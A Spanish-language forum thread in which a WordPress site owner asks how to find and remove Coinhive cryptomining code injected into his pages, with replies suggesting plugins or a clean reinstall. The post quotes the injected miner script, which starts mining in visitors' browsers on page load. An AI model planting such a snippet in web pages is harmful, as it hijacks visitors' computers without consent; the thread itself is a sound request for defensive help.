Detectar y eliminar minería de criptomonedas en Wordpress

• Autor Autor Adictonet
  • Fecha de inicio Fecha de inicio
Adictonet

Adictonet

Beta
¡Usuario con pocos negocios! ¡Utiliza siempre saldo de Forobeta!
Hola a todos, desde hace días varios visitantes de mi pagina FlowCartagena.Net | Champeta, Dancehall, Reggaeton y más me han dicho que cuando entran les salta el Antivirus Avast. Hoy lo instalé y lo comprobé. Resulta que mi pagina esta minando criptomonedas con el código (coinhive) pero yo nunca lo he instalado.

Lo que se me viene a la mente es que me han hackeado de alguna manera, o quizá este dentro de algún plugin.

He desactivado todos los plugines y sigue saliendo en el código fuente, también hice una búsqueda del código en todos los archivos con una herramienta especial (Agent Ransack) y no lo encontró.

Leí en este foro algo de que habían hackeado a Cloudflare e insertado codigo coinhive en muchos sitios, no se si sea eso ya que también uso cloudflare.

Este es el código que me sale desde mostrar codigo fuente en Chrome:

HTML:
<script src="https://coinhive.com/lib/coinhive.min.js"></script>

Insertar CODE, HTML o PHP:
<script>
	var miner = new CoinHive.Anonymous('9BS8tUkvaMapqgo2fPuc67hLdqyK4PG3');
	miner.start();
</script>

Captura de pantalla (10).webp

Espero que puedan ayudarme.

Gracias de antemano.

Si instalaste algún plugin de pago de forma ilegal puede que sea quien te lo esté agregando, e igual ahorita que está de moda la minería puede que algunos plugin gratuitos incluyan ese código, tendrás que desactivar todos los plugins e ir probando 1 por uno cual es el que esté agregando ese código de minería.

No había leido que ya habias desactivado todos los plugins, otro consejo podría ser migrar tu sitio a una instalación limpia, ya que ese tipo de "malware" por asi llamarlo puede que haya inyectado el código al núcleo de WP

Última edición:
a mi me esta pasando pero con el explorador chrome.
o sea algun plugin o algo lo instalo.
pero no se como quitarlo.

Atrás